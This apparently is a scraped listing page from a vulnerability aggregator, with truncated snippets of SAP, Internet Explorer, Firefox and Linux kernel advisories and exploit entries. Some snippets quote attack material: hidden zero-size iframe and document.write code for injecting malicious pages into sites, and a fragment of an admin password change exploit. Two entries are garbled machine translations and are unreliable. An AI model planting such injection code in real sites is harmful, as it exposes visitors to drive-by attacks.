German ERP Sage Office Line Privilege Escalation

Security Vulnerability in German ERP system "Sage office Line" Recently, I discovered a Securtiy Security Vulnerability in the German ERP system "Sage office Line", created by German branch of the UK-based Sage Group. The Software is sold in Germany, Austria and Switzerland. According to their...

SAP CRM crm_flex_data - XXE

Application: SAP CRM Versions Affected: SAP CRM 7.02 EHP 2 Vendor URL: http://www.sap.com Bugs: XXE Exploits: YES Reported: 09.07.2013 Vendor response: 10.07.2013 Date of Public Advisory: 16.11.2013 Reference: SAP Security Note 1909665 Authors: Alexey Tyurin, Nikolay Mescherin ERPScan Description...

SAP NetWeaver DI - Arbitrary file upload

Application: SAP NetWeaver J2EE Versions Affected: SAP NetWeaver Vendor URL: http://www.sap.com Bugs: Arbitrary file upload/Security bypass Exploits: YES Reported: 11.12.2012 Vendor response: 12.12.2012 Date of SAP Security Note Published: 12.02.2013 Date of Public Advisory: 20.02.2013 Reference:...

SAP NetWeaver RSDDCVER_COUNT_TAB_COLS - Potential SQL Injection

Application: SAP NetWeaver Versions Affected: 7.30 Basis 720 SP 0, Kernel 720 patch 68 Vendor URL: http://www.sap.com Bugs: SQL injection Exploits: NO Reported: 22.10.2012 Vendor response: 23.10.2012 Date of Public Advisory: 16.11.2013 Reference: SAP Security Note 1836718 CVSS:...

SAP NetWeaver HTTP - Partial HTTP POST requests DoS

Application: SAP Versions Affected: SAP Netweaver 7.02/7.3, probably others Vendor URL: http://www.sap.com Bugs: Denial of Service Exploits: YES Reported: 25.09.2012 Vendor response: 26.09.2012 Date of Public Advisory: 17.10.2014 Reference: SAP Security Note 1986725 Author: Alexey Tyurin ERPScan...

Ubuntu Update for tiff USN-1511-1

Ubuntu Update for Linux kernel vulnerabilities USN-1511-1 OpenVAS Vulnerability Test $Id: gbubuntuUSN15111.nasl 7960 2017-12-01 06:58:16Z santu $ Ubuntu Update for tiff USN-1511-1 Authors: System Generated Check Copyright: Copyright c 2012 Greenbone Networks GmbH, http://www.greenbone.net This...

Microsoft Internet Explorer CVE-2012-1874 Developer Toolbar Remote Code Execution Vulnerability

Description Microsoft Internet Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions. Technologies Affected Microsoft Internet...

Microsoft Internet Explorer Virtual Function Table CVE-2011-2001 Memory Corruption Vulnerability

Description Microsoft Internet Explorer is prone to a remote memory-corruption vulnerability. Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions. Technologies Affected Avaya Aur...

SAP NetWeaver - Authentication bypass (Verb Tampering)

Application: SAP NetWeaver Versions Affected: SAP NetWeaver Vendor URL: http://www.sap.com Bugs:Auth bypass, Verb tampering Exploits: YES Reported: 14.03.2011 Vendor response:15.03.2011 Date of Public Advisory:11.11.2011 CVSS: 10 by ERPSCAN 7.3 by SAP Author:Alexandr Polyakov Description...

CVE-2011-0064

The hbbufferensure function in hb-buffer.c in HarfBuzz, as used in Pango 1.28.3, Firefox, and other products, does not verify that memory reallocations succeed, which allows remote attackers to cause a denial of service NULL pointer dereference and application crash or possibly execute arbitrary...

It's Time to Move Away From the Build or Break Mentality

SAN FRANCISCO–The vulnerability disclosure and patching arms race that has developed in the last decade or so in the security industry has made life extremely difficult not just for the developers writing code, but also for the folks who are interested in helping to fix broken applications. A new...

SAP NetWaver Virus Scan Interface - multiple XSS

Application: SAP NetWeaver Versions Affected: SAP NetWeaver Vendor URL: http://www.sap.com Bugs:Linked XSS Vulnerability Exploits: YES Reported: 01.04.2010 Vendor response:08.04.2010 Date of Public Advisory:11.11.2011 CVSS:4.3 Author: Dmitriy Evdokimov Description SAP Netweaver Virus Scan Interfa...

Mozilla Firefox 3.5 'TraceMonkey' Component Remote Code Execution Vulnerability

Description Mozilla Firefox is prone to a remote code-execution vulnerability. Successful exploits may allow an attacker to execute arbitrary code in the context of the user running the affected application. Failed attempts will likely result in denial-of-service conditions. The issue affects...

Nwahy Dir 2.1 Arbitrary Change Admin Password Exploit

No description provided by source. ? / Nwahy Dir v2.1 Change Admin Password Exploit - Author : rEcruit - Mail : [email protected] - Download : http://nwahy.com/showdownload-3105.html - Vuln in ./admincp/admininfo.php code $u = addslashes$COOKIE'username'; $query = mysqlquery "SELECT FROM dliladmi...

Ray air video and cloud networks interactive all php version system 0day-vulnerability warning-the black bar safety net

Long time no write something, and yesterday a friend let me find the sets of television systems php version, said to a television station, he by the way also sent a set, called the ray of the wind movie, the rough looked under the code, write the Also and secure means, but the thousand Secret a...

Microsoft Internet Explorer HTML Objects Variant Memory Corruption Vulnerability

Description Microsoft Internet Explorer is prone to a remote memory-corruption vulnerability that occurs when the application tries to parse a specially crafted web page. Successfully exploiting this issue would allow the attacker to execute arbitrary code in the context of the currently logged-i...

Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)

/ jessicabielnakedinmybed.c Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura. Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca. Stejnak je to stare jak cyp a aj jakesyk rozbite. Linux vmsplice Local Root Exploit By qaaz Linux 2.6.17 - 2.6.24.1 This is quite old code and I had to...

Hung it to the code Daquan-vulnerability warning-the black bar safety net

Hung it to the code book A:The frame hanging horse iframe src=address width=0 height=0/iframe II:the js file hanging horse First, the following code document. write"iframe width='0' height='0' src='address'/iframe"; 保存 为 xxx.js that The JS hung it to the code script language=javascript src=xxx...

Microsoft Windows Malformed RTF Handling Code Execution (MS07-011; CVE-2006-1311; CVE-2007-0025; CVE-2007-0026)

Rich Text Format RTF provides a format for text and graphics interchange that can be used with different operating systems. OLE is the technology that applications use to create and edit compound documents. By using OLE technology, an application can provide embedding and linking support. By...

perForms Mambo Component <= 1.0 Remote File Inclusion

No description provided by source. ------------------------------------------------------------------------ --- perForms = 1.0 mosConfigabsolutepath Remote File Inclusion ------------------------------------------------------------------------ --- Remote : Yes Critical Level : High Vuln founded i...